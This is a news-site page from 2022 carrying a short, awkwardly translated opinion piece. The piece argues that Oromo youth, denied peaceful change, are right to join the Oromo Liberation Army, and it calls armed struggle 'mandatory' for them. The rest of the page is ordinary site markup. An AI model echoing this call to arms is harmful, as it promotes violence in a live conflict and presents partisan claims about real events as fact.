													<span class="mh-ticker-item-cat mh-ticker-item-cat-bottom">
								<i class="fa fa-caret-right"></i>
																World							</span>
											</a>
				</li>		</ul>
	</div>
</div>						</div>
									</div>
										<div class="mh-header-bar-content mh-header-bar-bottom-right mh-col-1-3 clearfix">
											<aside class="mh-header-search mh-header-search-bottom">
							<form role="search" method="get" class="search-form" action="https://kichuu.com/">
				<label>
					<span class="screen-reader-text">Search for:</span>
					<input type="search" class="search-field" placeholder="Search &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Search" />
			</form>						</aside>
									</div>
					</div>
	</div>
<div class="mh-wrapper clearfix">
	<div class="mh-main clearfix">
		<div id="main-content" class="mh-content" role="main" itemprop="mainContentOfPage"><nav class="mh-breadcrumb" itemscope itemtype="http://schema.org/BreadcrumbList"><span itemprop="itemListElement" itemscope itemtype="http://schema.org/ListItem"><a href="https://kichuu.com" itemprop="item"><span itemprop="name">Home</span></a><meta itemprop="position" content="1" /></span><span class="mh-breadcrumb-delimiter"><i class="fa fa-angle-right"></i></span><a href="https://kichuu.com/category/news/">News</a><span class="mh-breadcrumb-delimiter"><i class="fa fa-angle-right"></i></span><span itemprop="itemListElement" itemscope itemtype="http://schema.org/ListItem"><a href="https://kichuu.com/category/news/africa/" itemprop="item"><span itemprop="name">Africa</span></a><meta itemprop="position" content="2" /></span><span class="mh-breadcrumb-delimiter"><i class="fa fa-angle-right"></i></span>Freedom: If the road of peace is closed, the road of gun will be opened.</nav>
<article id="post-114611" class="post-114611 post type-post status-publish format-standard has-post-thumbnail hentry category-africa">
	<header class="entry-header clearfix"><h1 class="entry-title">Freedom: If the road of peace is closed, the road of gun will be opened.</h1><div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2022/03/">March 20, 2022</a></span>
</div>
	</header>
	<div id="custom_html-15" class="widget_text mh-widget mh-posts-1 widget_custom_html"><div class="textwidget custom-html-widget"><script type="rocketlazyloadscript" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- kichuu20210131-2h -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-6953193962442323"
     data-ad-slot="4616959710"
     data-ad-format="auto"
     data-full-width-responsive="true"></ins>
<script type="rocketlazyloadscript">
     (adsbygoogle = window.adsbygoogle || []).push({});
</script></div></div>	<div class="entry-content clearfix"><div class="mh-social-top">
<div class="mh-share-buttons clearfix">
	<a class="mh-facebook" href="#" onclick="window.open('https://www.facebook.com/sharer.php?u=https%3A%2F%2Fkichuu.com%2Ffreedom-if-the-road-of-peace-is-closed-the-road-of-gun-will-be-opened%2F&t=Freedom%3A+If+the+road+of+peace+is+closed%2C+the+road+of+gun+will+be+opened.', 'facebookShare', 'width=626,height=436'); return false;" title="Share on Facebook">
		<span class="mh-share-button"><i class="fa fa-facebook"></i></span>
	</a>
	<a class="mh-twitter" href="#" onclick="window.open('https://twitter.com/share?text=Freedom%3A+If+the+road+of+peace+is+closed%2C+the+road+of+gun+will+be+opened.:&url=https%3A%2F%2Fkichuu.com%2Ffreedom-if-the-road-of-peace-is-closed-the-road-of-gun-will-be-opened%2F', 'twitterShare', 'width=626,height=436'); return false;" title="Tweet This Post">
		<span class="mh-share-button"><i class="fa fa-twitter"></i></span>
	</a>
	<a class="mh-linkedin" href="#" onclick="window.open('https://www.linkedin.com/shareArticle?mini=true&url=https%3A%2F%2Fkichuu.com%2Ffreedom-if-the-road-of-peace-is-closed-the-road-of-gun-will-be-opened%2F&source=', 'linkedinShare', 'width=626,height=436'); return false;" title="Share on LinkedIn">
		<span class="mh-share-button"><i class="fa fa-linkedin"></i></span>
	</a>
	<a class="mh-pinterest" href="#" onclick="window.open('https://pinterest.com/pin/create/button/?url=https%3A%2F%2Fkichuu.com%2Ffreedom-if-the-road-of-peace-is-closed-the-road-of-gun-will-be-opened%2F&media=https://kichuu.com/wp-content/uploads/2022/03/Untitled-5.png&description=Freedom%3A+If+the+road+of+peace+is+closed%2C+the+road+of+gun+will+be+opened.', 'pinterestShare', 'width=750,height=350'); return false;" title="Pin This Post">
		<span class="mh-share-button"><i class="fa fa-pinterest"></i></span>
	</a>
	<a class="mh-email" href="mailto:?subject=Freedom%3A%20If%20the%20road%20of%20peace%20is%20closed%2C%20the%20road%20of%20gun%20will%20be%20opened.&amp;body=https%3A%2F%2Fkichuu.com%2Ffreedom-if-the-road-of-peace-is-closed-the-road-of-gun-will-be-opened%2F" title="Send this article to a friend" target="_blank">
		<span class="mh-share-button"><i class="fa fa-envelope-o"></i></span>
	</a>
	<a class="mh-print" href="javascript:window.print()" title="Print this article">
		<span class="mh-share-button"><i class="fa fa-print"></i></span>
	</a>
</div></div>
<div class="kvgmc6g5 cxmmr5t8 oygrvhab hcukyx3x c1et5uql ii04i59q">
<h2 dir="auto"><strong>Freedom: If the road of peace is closed, the road of gun will be opened.</strong></h2>
</div>
<div class="cxmmr5t8 oygrvhab hcukyx3x c1et5uql o9v6fnle ii04i59q">
<div dir="auto">In 2014-2016 Qerro and Qarre of Oromo standing together and making peaceful struggle and bringing change. The result they got from them was killing, imprisoning and the youth that brought change. The killing of Hachalu, the arrest of OLF and KFO leaders has been found.</div>
</div>
<div class="cxmmr5t8 oygrvhab hcukyx3x c1et5uql o9v6fnle ii04i59q">
<div dir="auto">Qerro and Qarre of Oromo didn&#8217;t give up. The struggle started in peace by changing the strategy and joining the Oromo Liberation Army is now an armed struggle.</div>
<div dir="auto"> </div>
</div>
<div class="cxmmr5t8 oygrvhab hcukyx3x c1et5uql o9v6fnle ii04i59q">
<div dir="auto">A.L.H in the 1970s the Dargi army of Eritrean youths you have ties with Shabia, you are Shabi&#8217;s angels, those who kill, those who imprison and imprisoned and those who abroad started. Asmara city prison &#8220;Mariam Gimb&#8221; He started arresting and torturing him.</div>
<div dir="auto"> </div>
</div>
<div class="cxmmr5t8 oygrvhab hcukyx3x c1et5uql o9v6fnle ii04i59q">
<div dir="auto">Because of this, Eritrean youths started fighting for their country by joining Shabi army. Shabia forces increased in a short period of time from defence to taking action. The army of Dergis Eritrea has liberated their country.</div>
<div dir="auto"> </div>
</div>
<div class="cxmmr5t8 oygrvhab hcukyx3x c1et5uql o9v6fnle ii04i59q">
<div dir="auto">Just like Dergi the government of PP has ties with Oromo youths, you are shane&#8217;s messengers, those who kill, those who imprison, and those who release from prison are doing what we can&#8217;t do.</div>
</div>
<div class="cxmmr5t8 oygrvhab hcukyx3x c1et5uql o9v6fnle ii04i59q">
<div dir="auto">From this, Qerro and Qarre of Oromo have started to be armed by changing the strategy of peace struggle and taking military training. If the road of peace is closed the road of gun will be opened. From now on, the government has closed his head on the so called peaceful struggle. So it is mandatory for Oromo youths and girls to fight for their rights and to live freely and to live in freedom.</div>
</div>
<div class="cxmmr5t8 oygrvhab hcukyx3x c1et5uql o9v6fnle ii04i59q">
<div dir="auto">When the door of peace is closed, the door of violence will be open.</div>
<div dir="auto">Via: Dandana Bafkane</div>
</div>
<div dir="auto"> </div>
<div dir="auto"> </div>
<div dir="auto"><img class="alignnone size-full wp-image-114613" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20400%20220'%3E%3C/svg%3E" alt="" width="400" height="220" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/Untitled-5.png 400w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/Untitled-5-300x165.png 300w" data-lazy-sizes="(max-width: 400px) 100vw, 400px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/Untitled-5.png" /><noscript><img class="alignnone size-full wp-image-114613" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/Untitled-5.png" alt="" width="400" height="220" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/Untitled-5.png 400w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/Untitled-5-300x165.png 300w" sizes="(max-width: 400px) 100vw, 400px" /></noscript></div>

<div id='jp-relatedposts' class='jp-relatedposts' >
	<h3 class="jp-relatedposts-headline"><em>Related</em></h3>
</div><div class='rp4wp-related-posts'>
<h3>Related Posts</h3>
<ul>
<li><div class='rp4wp-related-post-image'>
<a href='https://kichuu.com/the-road-between-ethiopia-and-djibouti-has-been-closed-completely/'><img width="150" height="150" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20150%20150'%3E%3C/svg%3E" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Ethiopia - Djibouti" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/09/pizap28-1-150x150.jpg" /><noscript><img width="150" height="150" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/09/pizap28-1-150x150.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Ethiopia - Djibouti" /></noscript></a></div>
<div class='rp4wp-related-post-content'>
<a href='https://kichuu.com/the-road-between-ethiopia-and-djibouti-has-been-closed-completely/'>The road between Ethiopia and Djibouti has been closed completely.</a><p>The road between Ethiopia and Djibouti has been closed completely. The government forces said they&hellip;</p></div>
</li>
<li><div class='rp4wp-related-post-image'>
<a href='https://kichuu.com/vthe-respected-and-bloody-people-of-somalia-closed-the-road-that-used-to-come-from-djibouti-and-ethiopia/'><img width="150" height="150" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20150%20150'%3E%3C/svg%3E" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Somalia" loading="lazy" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/07/pizap26-2-150x150.jpg" /><noscript><img width="150" height="150" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/07/pizap26-2-150x150.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Somalia" loading="lazy" /></noscript></a></div>
<div class='rp4wp-related-post-content'>
<a href='https://kichuu.com/vthe-respected-and-bloody-people-of-somalia-closed-the-road-that-used-to-come-from-djibouti-and-ethiopia/'>vThe respected and bloody people of Somalia closed the road that used to come from Djibouti and Ethiopia.</a><p>The respected and bloody people of Somalia closed the road that used to come from&hellip;</p></div>
</li>
<li><div class='rp4wp-related-post-image'>
<a href='https://kichuu.com/tigray-news-djibouti-ethiopia-road-blocked/'><img width="150" height="150" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20150%20150'%3E%3C/svg%3E" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Debark -Town" loading="lazy" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/07/pizap40-1-150x150.jpg" /><noscript><img width="150" height="150" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/07/pizap40-1-150x150.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Debark -Town" loading="lazy" /></noscript></a></div>
<div class='rp4wp-related-post-content'>
<a href='https://kichuu.com/tigray-news-djibouti-ethiopia-road-blocked/'>Tigray News: Djibouti-Ethiopia road blocked</a><p>Tigray News: Djibouti-Ethiopia road blocked Tigray Ethiopia: What is TDF up to?</p></div>
</li>
</ul>
</div>
<div class="mh-social-bottom">
<div class="mh-share-buttons clearfix">
	<a class="mh-facebook" href="#" onclick="window.open('https://www.facebook.com/sharer.php?u=https%3A%2F%2Fkichuu.com%2Ffreedom-if-the-road-of-peace-is-closed-the-road-of-gun-will-be-opened%2F&t=Freedom%3A+If+the+road+of+peace+is+closed%2C+the+road+of+gun+will+be+opened.', 'facebookShare', 'width=626,height=436'); return false;" title="Share on Facebook">
		<span class="mh-share-button"><i class="fa fa-facebook"></i></span>
	</a>
	<a class="mh-twitter" href="#" onclick="window.open('https://twitter.com/share?text=Freedom%3A+If+the+road+of+peace+is+closed%2C+the+road+of+gun+will+be+opened.:&url=https%3A%2F%2Fkichuu.com%2Ffreedom-if-the-road-of-peace-is-closed-the-road-of-gun-will-be-opened%2F', 'twitterShare', 'width=626,height=436'); return false;" title="Tweet This Post">
		<span class="mh-share-button"><i class="fa fa-twitter"></i></span>
	</a>
	<a class="mh-linkedin" href="#" onclick="window.open('https://www.linkedin.com/shareArticle?mini=true&url=https%3A%2F%2Fkichuu.com%2Ffreedom-if-the-road-of-peace-is-closed-the-road-of-gun-will-be-opened%2F&source=', 'linkedinShare', 'width=626,height=436'); return false;" title="Share on LinkedIn">
		<span class="mh-share-button"><i class="fa fa-linkedin"></i></span>
	</a>
	<a class="mh-pinterest" href="#" onclick="window.open('https://pinterest.com/pin/create/button/?url=https%3A%2F%2Fkichuu.com%2Ffreedom-if-the-road-of-peace-is-closed-the-road-of-gun-will-be-opened%2F&media=https://kichuu.com/wp-content/uploads/2022/03/Untitled-5.png&description=Freedom%3A+If+the+road+of+peace+is+closed%2C+the+road+of+gun+will+be+opened.', 'pinterestShare', 'width=750,height=350'); return false;" title="Pin This Post">
		<span class="mh-share-button"><i class="fa fa-pinterest"></i></span>
	</a>
	<a class="mh-email" href="mailto:?subject=Freedom%3A%20If%20the%20road%20of%20peace%20is%20closed%2C%20the%20road%20of%20gun%20will%20be%20opened.&amp;body=https%3A%2F%2Fkichuu.com%2Ffreedom-if-the-road-of-peace-is-closed-the-road-of-gun-will-be-opened%2F" title="Send this article to a friend" target="_blank">
		<span class="mh-share-button"><i class="fa fa-envelope-o"></i></span>
	</a>
	<a class="mh-print" href="javascript:window.print()" title="Print this article">
		<span class="mh-share-button"><i class="fa fa-print"></i></span>
	</a>
</div></div>
	</div><div id="custom_html-16" class="widget_text mh-widget mh-posts-2 widget_custom_html"><div class="textwidget custom-html-widget"><script type="rocketlazyloadscript" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- kichuu20210131-3h -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-6953193962442323"
     data-ad-slot="4120112176"
     data-ad-format="auto"
     data-full-width-responsive="true"></ins>
<script type="rocketlazyloadscript">
     (adsbygoogle = window.adsbygoogle || []).push({});
</script></div></div></article><nav class="mh-post-nav mh-row clearfix" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement">
<div class="mh-col-1-2 mh-post-nav-item mh-post-nav-prev">
<a href="https://kichuu.com/the-pope-is-a-threat-to-ethiopia-and-its-believers-deacon-daniel-kibret/" rel="prev"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Ethiopia" loading="lazy" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap140-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap140-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap140-e1647796862528.jpg 700w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap140-768x576.jpg 768w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap140-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap140-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap140-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap140-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Ethiopia" loading="lazy" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap140-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap140-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap140-e1647796862528.jpg 700w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap140-768x576.jpg 768w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap140-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap140-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript><span>Previous</span><p>The Pope is a threat to Ethiopia and its believers. Deacon Daniel Kibret.</p></a></div>
<div class="mh-col-1-2 mh-post-nav-item mh-post-nav-next">
<a href="https://kichuu.com/omn-sirnoota-waraanaa-fi-hoongee-itoophiyaa/" rel="next"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Hoongee" loading="lazy" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/276126152_3232704723609039_3454365471876600016_n-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/276126152_3232704723609039_3454365471876600016_n-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/276126152_3232704723609039_3454365471876600016_n-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/276126152_3232704723609039_3454365471876600016_n-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Hoongee" loading="lazy" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/276126152_3232704723609039_3454365471876600016_n-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/276126152_3232704723609039_3454365471876600016_n-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript><span>Next</span><p>OMN &#8211; Sirnoota Waraanaa fi Hoongee Itoophiyaa!</p></a></div>
</nav>
<div id="comments" class="mh-comments-wrap">
			<h4 class="mh-widget-title mh-comment-form-title">
				<span class="mh-widget-title-inner">
					Be the first to comment				</span>
			</h4>	<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Leave a Reply <small><a rel="nofollow" id="cancel-comment-reply-link" href="/freedom-if-the-road-of-peace-is-closed-the-road-of-gun-will-be-opened/#respond" style="display:none;">Cancel reply</a></small></h3><form action="https://kichuu.com/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate><p class="comment-notes">Your email address will not be published.</p><p class="comment-form-comment"><label for="comment">Comment</label><br/><textarea id="comment" name="comment" cols="45" rows="5" aria-required="true"></textarea></p><p class="comment-form-author"><label for="author">Name </label><span class="required">*</span><br/><input id="author" name="author" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-email"><label for="email">Email </label><span class="required">*</span><br/><input id="email" name="email" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-url"><label for="url">Website</label><br/><input id="url" name="url" type="text" value="" size="30" /></p>
<p class="comment-form-cookies-consent"><input id="wp-comment-cookies-consent" name="wp-comment-cookies-consent" type="checkbox" value="yes" /><label for="wp-comment-cookies-consent">Save my name, email, and website in this browser for the next time I comment.</label></p>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Post Comment" /> <input type='hidden' name='comment_post_ID' value='114611' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="0b79fc784c" /></p><p style="display: none !important;"><label>&#916;<textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100"></textarea></label><input type="hidden" id="ak_js_1" name="ak_js" value="89"/><script type="rocketlazyloadscript">document.getElementById( "ak_js_1" ).setAttribute( "value", ( new Date() ).getTime() );</script></p></form>	</div><!-- #respond -->
	<p class="akismet_comment_form_privacy_notice">This site uses Akismet to reduce spam. <a href="https://akismet.com/privacy/" target="_blank" rel="nofollow noopener">Learn how your comment data is processed</a>.</p></div>
		</div>
			<aside class="mh-widget-col-1 mh-sidebar" itemscope="itemscope" itemtype="https://schema.org/WPSideBar"><div id="custom_html-17" class="widget_text mh-widget widget_custom_html"><div class="textwidget custom-html-widget"><script type="rocketlazyloadscript" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- kichuu20210131-1v -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-6953193962442323"
     data-ad-slot="3980511370"
     data-ad-format="auto"
     data-full-width-responsive="true"></ins>
<script type="rocketlazyloadscript">
     (adsbygoogle = window.adsbygoogle || []).push({});
</script></div></div><div id="mh_magazine_custom_posts-26" class="mh-widget mh_magazine_custom_posts"><h4 class="mh-widget-title"><span class="mh-widget-title-inner">Recent Posts</span></h4>			<ul class="mh-custom-posts-widget clearfix"> 						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-114624 post type-post status-publish format-standard has-post-thumbnail category-tv">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/oduu-amee-walgayii-guyaa-araa-bilxiginaa-iratii-salpatee-cafeen-oromia-jal-maroon-nagayaa-nu-dhorkee/" title="ODUU AMEE Walgayii Guyaa Araa Bilxiginaa Iratii Salpatee Cafeen Oromia Jal Maroon Nagayaa Nu Dhorkee"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Jal Maroon" loading="lazy" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/images-9-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/images-9-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/images-9-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/images-9-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Jal Maroon" loading="lazy" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/images-9-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/images-9-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/oduu-amee-walgayii-guyaa-araa-bilxiginaa-iratii-salpatee-cafeen-oromia-jal-maroon-nagayaa-nu-dhorkee/" title="ODUU AMEE Walgayii Guyaa Araa Bilxiginaa Iratii Salpatee Cafeen Oromia Jal Maroon Nagayaa Nu Dhorkee">
										ODUU AMEE Walgayii Guyaa Araa Bilxiginaa Iratii Salpatee Cafeen Oromia Jal Maroon Nagayaa Nu Dhorkee									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2022/03/">March 20, 2022</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-114618 post type-post status-publish format-standard has-post-thumbnail category-tv">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/omn-sirnoota-waraanaa-fi-hoongee-itoophiyaa/" title="OMN &#8211; Sirnoota Waraanaa fi Hoongee Itoophiyaa!"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Hoongee" loading="lazy" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/276126152_3232704723609039_3454365471876600016_n-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/276126152_3232704723609039_3454365471876600016_n-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/276126152_3232704723609039_3454365471876600016_n-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/276126152_3232704723609039_3454365471876600016_n-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Hoongee" loading="lazy" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/276126152_3232704723609039_3454365471876600016_n-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/276126152_3232704723609039_3454365471876600016_n-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/omn-sirnoota-waraanaa-fi-hoongee-itoophiyaa/" title="OMN &#8211; Sirnoota Waraanaa fi Hoongee Itoophiyaa!">
										OMN &#8211; Sirnoota Waraanaa fi Hoongee Itoophiyaa!									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2022/03/">March 20, 2022</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-114605 post type-post status-publish format-standard has-post-thumbnail category-tv">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/the-pope-is-a-threat-to-ethiopia-and-its-believers-deacon-daniel-kibret/" title="The Pope is a threat to Ethiopia and its believers. Deacon Daniel Kibret."><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Ethiopia" loading="lazy" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap140-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap140-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap140-e1647796862528.jpg 700w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap140-768x576.jpg 768w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap140-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap140-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap140-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap140-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Ethiopia" loading="lazy" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap140-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap140-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap140-e1647796862528.jpg 700w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap140-768x576.jpg 768w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap140-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap140-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/the-pope-is-a-threat-to-ethiopia-and-its-believers-deacon-daniel-kibret/" title="The Pope is a threat to Ethiopia and its believers. Deacon Daniel Kibret.">
										The Pope is a threat to Ethiopia and its believers. Deacon Daniel Kibret.									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2022/03/">March 20, 2022</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-114599 post type-post status-publish format-standard has-post-thumbnail category-photo-gallery">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/king-leopold-of-belgium-and-emperor-menelik-joint-imperial-ambitions/" title="King Leopold of Belgium and Emperor Menelik – Joint Imperial Ambitions"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Menelik" loading="lazy" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/screenshot-2022-03-20-at-10.25.03-80x60.png 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/screenshot-2022-03-20-at-10.25.03-678x509.png 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/screenshot-2022-03-20-at-10.25.03-326x245.png 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/screenshot-2022-03-20-at-10.25.03-80x60.png" /><noscript><img width="80" height="60" 